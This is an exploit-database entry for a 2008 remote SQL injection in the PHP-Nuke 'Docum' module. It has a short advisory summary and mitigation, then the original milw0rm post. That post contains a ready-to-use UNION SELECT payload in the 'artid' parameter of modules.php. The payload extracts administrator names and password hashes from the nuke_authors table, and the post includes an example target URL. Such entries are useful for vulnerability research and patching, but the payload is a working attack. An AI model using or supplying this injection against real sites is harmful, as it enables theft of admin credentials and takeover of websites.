php-nuke modules Docum remote sql inj

vendor:

modules Docum

by:

DamaR

8.5

CVSS

HIGH

SQL Injection

CWE

Product Name: modules Docum

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

php-nuke modules Docum remote sql inj

A remote SQL injection vulnerability exists in php-nuke modules Docum. An attacker can exploit this vulnerability to gain access to the database and execute arbitrary SQL commands. This vulnerability is due to an error in the 'modules.php' script when handling the 'artid' parameter. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable script. Successful exploitation will result in execution of arbitrary SQL commands.

Mitigation:

Upgrade to the latest version of php-nuke modules Docum.

Source

Exploit-DB raw data:

#########################################################################

           php-nuke modules Docum remote sql inj
#########################################################################

Found:DamaR

By.Damar@Hotmail.Com

Hack Bitti ama DÃ¶nmek YakÄ±n  Since 2000
-------------------------------------------------------------------------------


/modules.php?name=Docum&op=viewarticle&artid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%20%20/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*where%20admin%20-2

#########################################################################
Example: http://www.xxx.com.ar/mt/


#########################################################################

# milw0rm.com [2008-02-20]